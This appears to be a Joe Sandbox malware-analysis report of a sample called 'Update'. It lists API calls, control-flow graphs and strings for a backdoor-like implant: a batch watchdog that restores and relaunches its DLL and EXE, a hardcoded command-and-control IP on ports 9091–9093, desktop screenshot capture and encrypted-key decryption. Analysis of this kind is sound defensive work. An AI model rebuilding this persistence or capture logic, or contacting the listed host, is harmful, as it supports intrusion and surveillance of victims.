                                                                                                • :CheckProcess, xrefs: 6CA8813D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strlen$CloseHandleIos_base_dtorstd::ios_base::_$CopyFileProcess$CreateOpenPathTemp
                                                                                                • String ID: copy /Y "%BackupDLLPath%" "%DLLPath%"$ copy /Y "%BackupProcessPath%" "%ProcessPath%"$ echo DLL file not found, restoring from backup...$ echo Process file not found, restoring from backup...$ start "" "%ProcessPath%"$.bat$.pid$:CheckProcess$@echo off$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $cmd.exe /B /c "%s"$goto CheckProcess$if %ERRORLEVEL% neq 0 ($if not exist "%DLLPath%" ($if not exist "%ProcessPath%" ($set "BackupDLLPath=$set "BackupProcessPath=$set "DLLPath=$set "ProcessName=$set "ProcessPath=$tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul$timeout /t 30 /nobreak >nul$tor.
                                                                                                • API String ID: 321380216-101450228
                                                                                                • Opcode ID: 7da80d1a6264a60a51068aeb452e1e7a9cb52deb50854ae99d00d0d5e5738888
                                                                                                • Instruction ID: 5fc499b5dde7a16966b16e2abbbec593da742807be589b7285ef4d9267d1615a
                                                                                                • Opcode Fuzzy Hash: 7da80d1a6264a60a51068aeb452e1e7a9cb52deb50854ae99d00d0d5e5738888
                                                                                                • Instruction Fuzzy Hash: C1E29EB1901B048FD324CF38C984BA7B7E6BF95308F044A2DD59A87B81EB75E589CB51
                                                                                                APIs
                                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 00C704AE
                                                                                                • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 00C704DE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3509855269.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_c70000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocInfoNativeSystemVirtual
                                                                                                • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                • API String ID: 2032221330-2899676511
                                                                                                • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                • Instruction ID: 59d583895cb0ad254aa07879836a6108f5843e1caa84a7839f31bc5f99876074
                                                                                                • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                • Instruction Fuzzy Hash: 02628D71508385CFD720CF24C840BABBBE4FF94714F14882DE9D99B292E770AA49CB56

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 726 37fdf10-37fdf72 call 3800542 Sleep 729 37fdf97-37fdf9d 726->729 730 37fdf74-37fdf91 call 37ff707 call 37ffa29 CloseHandle 726->730 732 37fdf9f call 37f7620 729->732 733 37fdfa4-37fe019 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 37ffa29 CloseHandle call 37ff707 729->733 730->729 732->733 742 37fe01b-37fe026 call 37f2c90 733->742 743 37fe028 733->743 745 37fe02c-37fe046 call 37ff707 742->745 743->745 749 37fe048-37fe049 call 37f9730 745->749 750 37fe054 745->750 753 37fe04e-37fe052 749->753 752 37fe058 750->752 754 37fe063-37fe06f call 37fce00 752->754 753->752 757 37fe0b9-37fe0fa call 37ff876 * 2 754->757 758 37fe071-37fe0b7 call 37ff876 * 2 754->758 767 37fe100-37fe110 757->767 758->767 768 37fe152-37fe15a 767->768 769 37fe112-37fe14c call 37fce00 call 37ff876 * 2 767->769 770 37fe15c-37fe15e 768->770 771 37fe162-37fe169 768->771 769->768 770->771 773 37fe16b-37fe175 771->773 774 37fe177-37fe17b 771->774 776 37fe181-37fe187 773->776 774->776 778 37fe189-37fe1a3 EnumWindows 776->778 779 37fe1c6-37fe1ee call 3800542 call 37f2da0 776->779 778->779 781 37fe1a5-37fe1c4 Sleep EnumWindows 778->781 787 37fe200-37fe2ac call 3800542 CreateEventA call 37ff876 call 37fca70 779->787 788 37fe1f0-37fe1fb Sleep 779->788 781->779 781->781 796 37fe2b7-37fe2bd 787->796 788->754 797 37fe2bf-37fe2f3 Sleep RegOpenKeyExW 796->797 798 37fe318-37fe32c call 37f5430 796->798 799 37fe2f5-37fe30b RegQueryValueExW 797->799 800 37fe311-37fe316 797->800 802 37fe331-37fe337 798->802 799->800 800->796 800->798 803 37fe36a-37fe370 802->803 804 37fe339-37fe365 CloseHandle 802->804 805 37fe372-37fe38e call 37ffa29 803->805 806 37fe390 803->806 804->754 809 37fe394 805->809 806->809 811 37fe396-37fe39d 809->811 812 37fe39f-37fe3ae Sleep 811->812 813 37fe40d-37fe420 811->813 812->811 814 37fe3b0-37fe3b7 812->814 817 37fe432-37fe46c call 3800542 Sleep CloseHandle 813->817 818 37fe422-37fe42c WaitForSingleObject CloseHandle 813->818 814->813 816 37fe3b9-37fe3cb 814->816 822 37fe3dd-37fe408 Sleep CloseHandle 816->822 823 37fe3cd-37fe3d7 WaitForSingleObject CloseHandle 816->823 817->754 818->817 822->754 823->822
                                                                                                APIs
                                                                                                  • Part of subcall function 03800542: __fassign.LIBCMT ref: 03800538
                                                                                                • Sleep.KERNEL32(00000000), ref: 037FDF64
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 037FDF91
                                                                                                • GetLocalTime.KERNEL32(?), ref: 037FDFA9
                                                                                                • wsprintfW.USER32 ref: 037FDFE0
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(037F75B0), ref: 037FDFEE
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 037FE007
                                                                                                  • Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721
                                                                                                • EnumWindows.USER32(037F5CC0,?), ref: 037FE19D
                                                                                                • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 037FE1AA
                                                                                                • EnumWindows.USER32(037F5CC0,?), ref: 037FE1BE
                                                                                                • Sleep.KERNEL32(00000BB8), ref: 037FE1F5
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 037FE241
                                                                                                • Sleep.KERNEL32(00000FA0), ref: 037FE2C4
                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 037FE2EB
                                                                                                • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 037FE30B
                                                                                                • CloseHandle.KERNEL32(?), ref: 037FE35D
                                                                                                • Sleep.KERNEL32(000003E8,?,?), ref: 037FE3A4
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 037FE3D0
                                                                                                • CloseHandle.KERNEL32(?,?,?), ref: 037FE3D7
                                                                                                • Sleep.KERNEL32(000003E8,?,?), ref: 037FE3E2
                                                                                                • CloseHandle.KERNEL32(?), ref: 037FE400
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 037FE425
                                                                                                • CloseHandle.KERNEL32(?,?,?), ref: 037FE42C
                                                                                                • Sleep.KERNEL32(00000000,?,?,?), ref: 037FE446
                                                                                                • CloseHandle.KERNEL32(?), ref: 037FE464
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                                                • String ID: %4d.%2d.%2d-%2d:%2d:%2d$137.220.229.61$137.220.229.61$137.220.229.61$137.220.229.61$9091$9091$9092$9093$Console$IpDatespecial
                                                                                                • API String ID: 1511462596-4238507324
                                                                                                • Opcode ID: d2b55334de014e9d933e4188922bf00a8950e001b0b69b0e4bb044f9c20392e0
                                                                                                • Instruction ID: 760493ee5417d4df732e3a345f8e214d45763302d6ff6d1822fc05551342c85c
                                                                                                • Opcode Fuzzy Hash: d2b55334de014e9d933e4188922bf00a8950e001b0b69b0e4bb044f9c20392e0
                                                                                                • Instruction Fuzzy Hash: CDD1DFB0944700AFD320EFA4DC89E2EFBA8FBC5B00F144AACF65596395DB749544CB62

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetDesktopWindow.USER32 ref: 037FBC8F
                                                                                                • GetDC.USER32(00000000), ref: 037FBC9C
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 037FBCA2
                                                                                                • GetDC.USER32(00000000), ref: 037FBCAD
                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 037FBCBA
                                                                                                • GetDeviceCaps.GDI32(00000000,00000076), ref: 037FBCC2
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 037FBCD3
                                                                                                • GetSystemMetrics.USER32(0000004E), ref: 037FBCF8
                                                                                                • GetSystemMetrics.USER32(0000004F), ref: 037FBD26
                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 037FBD78
                                                                                                • GetSystemMetrics.USER32(0000004D), ref: 037FBD8D
                                                                                                • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 037FBDA6
                                                                                                • SelectObject.GDI32(?,00000000), ref: 037FBDB4
                                                                                                • SetStretchBltMode.GDI32(?,00000003), ref: 037FBDC0
                                                                                                • GetSystemMetrics.USER32(0000004F), ref: 037FBDCD
                                                                                                • GetSystemMetrics.USER32(0000004E), ref: 037FBDE0
                                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 037FBE07
                                                                                                • _memset.LIBCMT ref: 037FBE7A
                                                                                                • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 037FBE97
                                                                                                • _memset.LIBCMT ref: 037FBEAF
                                                                                                  • Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721
                                                                                                • DeleteObject.GDI32(?), ref: 037FBF23
                                                                                                • DeleteObject.GDI32(?), ref: 037FBF2D
                                                                                                • ReleaseDC.USER32(00000000,?), ref: 037FBF39
                                                                                                • DeleteObject.GDI32(?), ref: 037FBFDF
                                                                                                • DeleteObject.GDI32(?), ref: 037FBFE9
                                                                                                • ReleaseDC.USER32(00000000,?), ref: 037FBFF5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                                                • String ID: ($6$gfff$gfff
                                                                                                • API String ID: 3293817703-713438465
                                                                                                • Opcode ID: fd9f0f1e58f6c9291fd2e713556056241cc13845ee647c6cbaaab2b338e23295
                                                                                                • Instruction ID: c163cfefa21228d833e31ac27e7b6c5e6333af9be242fd9b72f9c994521686c4
                                                                                                • Opcode Fuzzy Hash: fd9f0f1e58f6c9291fd2e713556056241cc13845ee647c6cbaaab2b338e23295
                                                                                                • Instruction Fuzzy Hash: 68D157B5E01308AFDB14EFE9E889A9EBBB9FF48300F144529F505AB340D774A945CB91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 963 6ca86eb0-6ca86f1b call 6ca86520 966 6ca86f1d-6ca86f2e 963->966 967 6ca86f65-6ca86fd6 call 6ca86780 CryptAcquireContextW 963->967 966->967 969 6ca86f30-6ca86f62 call 6ca87b50 call 6ca9f020 966->969 972 6ca86fdc-6ca8702c CryptImportKey 967->972 973 6ca873c2-6ca87425 call 6ca9d87e call 6ca9d2b3 967->973 969->967 975 6ca8742a-6ca8748f CryptReleaseContext call 6ca9d87e call 6ca9d2b3 972->975 976 6ca87032-6ca87044 CryptSetKeyParam 972->976 999 6ca875cc-6ca875d3 call 6ca826c0 973->999 975->999 979 6ca8704a-6ca8706a CryptSetKeyParam 976->979 980 6ca87494-6ca87502 CryptDestroyKey CryptReleaseContext call 6ca9d87e call 6ca9d2b3 976->980 984 6ca87070-6ca8709e 979->984 985 6ca87507-6ca87572 CryptDestroyKey CryptReleaseContext call 6ca9d87e call 6ca9d2b3 979->985 980->999 990 6ca870a0-6ca870a2 984->990 991 6ca870d3-6ca870d5 984->991 985->999 997 6ca875d8-6ca875f3 call 6ca87640 call 6ca86720 990->997 998 6ca870a8-6ca870b1 990->998 1001 6ca87115-6ca87141 CryptDecrypt CryptDestroyKey CryptReleaseContext 991->1001 1006 6ca870b3-6ca870d1 call 6ca9aa0e 998->1006 1007 6ca870d7-6ca870e0 call 6ca9aa0e 998->1007 999->997 1003 6ca87574-6ca875c9 call 6ca9d87e call 6ca9d2b3 1001->1003 1004 6ca87147-6ca87156 1001->1004 1003->999 1011 6ca87158-6ca8715f 1004->1011 1012 6ca87161 1004->1012 1023 6ca870e2-6ca87112 call 6ca9f020 1006->1023 1007->1023 1018 6ca871a8-6ca871c4 1011->1018 1012->1018 1019 6ca87163-6ca8716a 1012->1019 1018->999 1028 6ca871ca-6ca871cd 1018->1028 1025 6ca87188-6ca871a6 call 6ca9f5a0 1019->1025 1026 6ca8716c-6ca87186 call 6ca87a40 1019->1026 1023->1001 1025->1018 1026->1018 1029 6ca871ea-6ca87210 1028->1029 1030 6ca871cf-6ca871e8 call 6ca9f020 1028->1030 1037 6ca8722b-6ca87237 call 6ca9aa0e 1029->1037 1038 6ca87212-6ca87229 call 6ca9aa0e 1029->1038 1044 6ca8725a-6ca87262 1030->1044 1047 6ca87239-6ca87258 call 6ca9f020 1037->1047 1038->1047 1048 6ca8729b-6ca872a0 1044->1048 1049 6ca87264-6ca8726e 1044->1049 1047->1044 1050 6ca872eb-6ca872f0 1048->1050 1051 6ca872a2-6ca872b6 1048->1051 1053 6ca87270-6ca87286 1049->1053 1054 6ca87291-6ca87298 call 6ca9aa43 1049->1054 1060 6ca872f2-6ca87306 1050->1060 1061 6ca87336-6ca8733b 1050->1061 1058 6ca872b8-6ca872cf 1051->1058 1059 6ca872da-6ca872e4 call 6ca9aa43 1051->1059 1055 6ca8728c-6ca8728f 1053->1055 1056 6ca873bd call 6caa3a5e 1053->1056 1054->1048 1055->1054 1056->973 1058->1056 1067 6ca872d5-6ca872d8 1058->1067 1059->1050 1069 6ca87308-6ca87313 1060->1069 1070 6ca87325-6ca8732f call 6ca9aa43 1060->1070 1065 6ca87378-6ca8737d 1061->1065 1066 6ca8733d-6ca87347 1061->1066 1074 6ca8737f-6ca87389 1065->1074 1075 6ca873a7-6ca873bc 1065->1075 1072 6ca87349-6ca87360 1066->1072 1073 6ca87367-6ca87371 call 6ca9aa43 1066->1073 1067->1059 1069->1056 1077 6ca87319-6ca87323 1069->1077 1070->1061 1072->1056 1079 6ca87362-6ca87365 1072->1079 1073->1065 1081 6ca8738b-6ca87396 1074->1081 1082 6ca8739d-6ca873a4 call 6ca9aa43 1074->1082 1077->1070 1079->1073 1081->1056 1084 6ca87398-6ca8739b 1081->1084 1082->1075 1084->1082
                                                                                                APIs
                                                                                                  • Part of subcall function 6CA86520: CryptStringToBinaryA.CRYPT32(6CA86EEE,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6CA86570
                                                                                                  • Part of subcall function 6CA86520: CryptStringToBinaryA.CRYPT32(C708C483,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6CA8660E
                                                                                                • CryptAcquireContextW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000008), ref: 6CA86FCE
                                                                                                • CryptImportKey.ADVAPI32(00000000,00000208,00000014,00000000,00000000,00000000), ref: 6CA87024
                                                                                                • CryptSetKeyParam.ADVAPI32(00000000,00000001,00000000,00000000), ref: 6CA8703C
                                                                                                • CryptSetKeyParam.ADVAPI32(00000000,00000004,00000001,00000000), ref: 6CA87062
                                                                                                • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?), ref: 6CA87123
                                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 6CA8712E
                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6CA87139
                                                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 6CA873FF
                                                                                                  • Part of subcall function 6CA9D2B3: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?), ref: 6CA9D314
                                                                                                  • Part of subcall function 6CA826C0: _strlen.LIBCMT ref: 6CA82718
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Crypt$BinaryContextParamString$AcquireDecryptDestroyExceptionImportRaiseRelease___std_exception_copy_strlen
                                                                                                • String ID: Salt$ed__
                                                                                                • API String ID: 1577403515-3701620873
                                                                                                • Opcode ID: 0b2a5f7200ba214950dda137b5a6f68e7437a56590f97d15e7885b808d145e63
                                                                                                • Instruction ID: 01d7cf4cde2ae0d8558154dcfdf77a8919f5feabe1906ac55aee4f897f0a4eea
                                                                                                • Opcode Fuzzy Hash: 0b2a5f7200ba214950dda137b5a6f68e7437a56590f97d15e7885b808d145e63
                                                                                                • Instruction Fuzzy Hash: A622B0B2E112189FEB14CFA4CD45BEDBBB5BF45304F148158E405E7780EB759A88CBA1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1087 6ca86720-6ca86728 1088 6ca8672a-6ca86734 1087->1088 1089 6ca8676d-6ca8676f 1087->1089 1090 6ca8674f-6ca86766 call 6ca9aa43 1088->1090 1091 6ca86736-6ca86748 1088->1091 1090->1089 1092 6ca8674a-6ca8674d 1091->1092 1093 6ca86770-6ca8680e call 6caa3a5e CryptAcquireContextW 1091->1093 1092->1090 1099 6ca86e09-6ca86e67 call 6ca9d87e call 6ca9d2b3 1093->1099 1100 6ca86814-6ca8684e 1093->1100 1118 6ca86e6a-6ca86e8b call 6ca86720 * 2 1099->1118 1101 6ca86850-6ca86858 1100->1101 1103 6ca869e8-6ca86a08 CryptReleaseContext 1101->1103 1104 6ca8685e-6ca86874 CryptCreateHash 1101->1104 1106 6ca86a0a-6ca86a2d call 6ca87d60 call 6ca9f020 1103->1106 1107 6ca86a2f-6ca86a38 1103->1107 1108 6ca8687a-6ca86882 1104->1108 1109 6ca86d1c-6ca86d88 CryptReleaseContext call 6ca9d87e call 6ca9d2b3 1104->1109 1147 6ca86a5d-6ca86a62 1106->1147 1115 6ca86a3a-6ca86a5a call 6ca9f020 * 2 1107->1115 1116 6ca86a64-6ca86a76 call 6ca9f020 1107->1116 1113 6ca8689b-6ca868a1 1108->1113 1114 6ca86884-6ca86895 CryptHashData 1108->1114 1109->1118 1123 6ca868ad-6ca868b3 1113->1123 1124 6ca868a3-6ca868a6 1113->1124 1114->1113 1122 6ca86d8d-6ca86e02 CryptDestroyHash CryptReleaseContext call 6ca9d87e call 6ca9d2b3 1114->1122 1115->1147 1137 6ca86a79-6ca86a93 1116->1137 1122->1118 1131 6ca868b5 1123->1131 1132 6ca868b7-6ca868d6 call 6ca87650 1123->1132 1124->1123 1131->1132 1148 6ca868d8-6ca868e2 call 6ca87840 1132->1148 1149 6ca868e7-6ca868fe CryptHashData 1132->1149 1144 6ca86ab1-6ca86aba 1137->1144 1145 6ca86a95-6ca86aaf call 6ca87d60 1137->1145 1153 6ca86abc-6ca86ae2 call 6ca9f020 1144->1153 1154 6ca86aef-6ca86afc call 6ca9f020 1144->1154 1165 6ca86ae3-6ca86aed call 6ca9f020 1145->1165 1147->1137 1148->1149 1157 6ca86c5a-6ca86cb6 CryptDestroyHash CryptReleaseContext call 6ca9d87e call 6ca9d2b3 1149->1157 1158 6ca86904-6ca86929 CryptGetHashParam 1149->1158 1153->1165 1167 6ca86aff-6ca86b07 1154->1167 1157->1118 1163 6ca86cbb-6ca86d17 CryptDestroyHash CryptReleaseContext call 6ca9d87e call 6ca9d2b3 1158->1163 1164 6ca8692f-6ca8694a 1158->1164 1163->1118 1169 6ca8694c 1164->1169 1170 6ca86960 1164->1170 1165->1167 1173 6ca86b09-6ca86b13 1167->1173 1174 6ca86b35-6ca86b3a 1167->1174 1176 6ca8694e-6ca86951 1169->1176 1177 6ca86980-6ca869a1 CryptGetHashParam CryptDestroyHash 1170->1177 1178 6ca86962-6ca86969 1170->1178 1181 6ca86b2b-6ca86b32 call 6ca9aa43 1173->1181 1182 6ca86b15-6ca86b20 1173->1182 1184 6ca86b3c-6ca86b46 1174->1184 1185 6ca86b76-6ca86b7e 1174->1185 1176->1177 1189 6ca86c02-6ca86c55 CryptReleaseContext call 6ca9d87e call 6ca9d2b3 1177->1189 1190 6ca869a7-6ca869cf call 6ca87b50 1177->1190 1186 6ca8696b-6ca86978 call 6ca87a40 1178->1186 1187 6ca869d4-6ca869e3 call 6ca9f5a0 1178->1187 1181->1174 1196 6ca86e04 call 6caa3a5e 1182->1196 1197 6ca86b26-6ca86b29 1182->1197 1199 6ca86b48-6ca86b53 1184->1199 1200 6ca86b65-6ca86b6f call 6ca9aa43 1184->1200 1193 6ca86baf-6ca86bb4 1185->1193 1194 6ca86b80-6ca86b8d 1185->1194 1186->1177 1187->1176 1189->1118 1190->1101 1208 6ca86bee-6ca86c01 1193->1208 1209 6ca86bb6-6ca86bc0 1193->1209 1205 6ca86b8f-6ca86b9a 1194->1205 1206 6ca86ba5-6ca86bac call 6ca9aa43 1194->1206 1196->1099 1197->1181 1199->1196 1212 6ca86b59-6ca86b63 1199->1212 1200->1185 1205->1196 1217 6ca86ba0-6ca86ba3 1205->1217 1206->1193 1219 6ca86bc2-6ca86bd9 1209->1219 1220 6ca86be4-6ca86beb call 6ca9aa43 1209->1220 1212->1200 1217->1206 1219->1196 1223 6ca86bdf-6ca86be2 1219->1223 1220->1208 1223->1220
                                                                                                APIs
                                                                                                • CryptAcquireContextW.ADVAPI32 ref: 6CA86806
                                                                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 6CA8686C
                                                                                                • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 6CA8688D
                                                                                                • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6CA868F6
                                                                                                • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 6CA86921
                                                                                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 6CA8698E
                                                                                                • CryptDestroyHash.ADVAPI32(00000000), ref: 6CA86999
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Crypt$Hash$DataParam$AcquireContextCreateDestroy
                                                                                                • String ID:
                                                                                                • API String ID: 2113037386-0
                                                                                                • Opcode ID: d7b1e8fe06a2de00c6f0819e0e323b495997ccd4b8b7514ea157f84a4019d66f
                                                                                                • Instruction ID: 8a607758fb74788eb96d1462ef6c85ab12cdb72c1d0def97b634852f8d6b7546
                                                                                                • Opcode Fuzzy Hash: d7b1e8fe06a2de00c6f0819e0e323b495997ccd4b8b7514ea157f84a4019d66f
                                                                                                • Instruction Fuzzy Hash: F52269B2E112189FEF14CFA8CD45BEEBBB5BB49304F148158E405E7740DB759989CBA0
                                                                                                APIs
                                                                                                • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 037F8132
                                                                                                • lstrcmpiW.KERNEL32(?,A:\), ref: 037F8166
                                                                                                • lstrcmpiW.KERNEL32(?,B:\), ref: 037F8176
                                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037F81A6
                                                                                                • lstrlenW.KERNEL32(?), ref: 037F81B7
                                                                                                • __wcsnicmp.LIBCMT ref: 037F81CE
                                                                                                • lstrcpyW.KERNEL32(00000AD4,?), ref: 037F8204
                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 037F8228
                                                                                                • lstrcatW.KERNEL32(?,00000000), ref: 037F8233
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                                                • String ID: A:\$B:\
                                                                                                • API String ID: 950920757-1009255891
                                                                                                • Opcode ID: c002867f02712bc0dd86cf9387ddb2ba29077fac5f7ee52597c288ece76a1900
                                                                                                • Instruction ID: c4ef4e80a07c769a258b7a824dbf3b7b7cd7527a057e42a8731d8890624ce533
                                                                                                • Opcode Fuzzy Hash: c002867f02712bc0dd86cf9387ddb2ba29077fac5f7ee52597c288ece76a1900
                                                                                                • Instruction Fuzzy Hash: FE419772A01618EFDB20EF64DD84AAEB37CFF44710F0445D9DA1AA7240EB74EA05CB95
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $'$jIk$6
                                                                                                • API String ID: 0-3404073836
                                                                                                • Opcode ID: e04258be32b16905a3b88c41a0a2badc8e1eeb476bc9a8cfe57a55c01292e48e
                                                                                                • Instruction ID: 685b0b05808783aa898bbd053e57cab659fe06db78276df118844b3d6285b498
                                                                                                • Opcode Fuzzy Hash: e04258be32b16905a3b88c41a0a2badc8e1eeb476bc9a8cfe57a55c01292e48e
                                                                                                • Instruction Fuzzy Hash: B1C2BC71D112688BEB24CF68CC957EDBBF2BF46304F148298D449AB691DB715AC8CF81
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
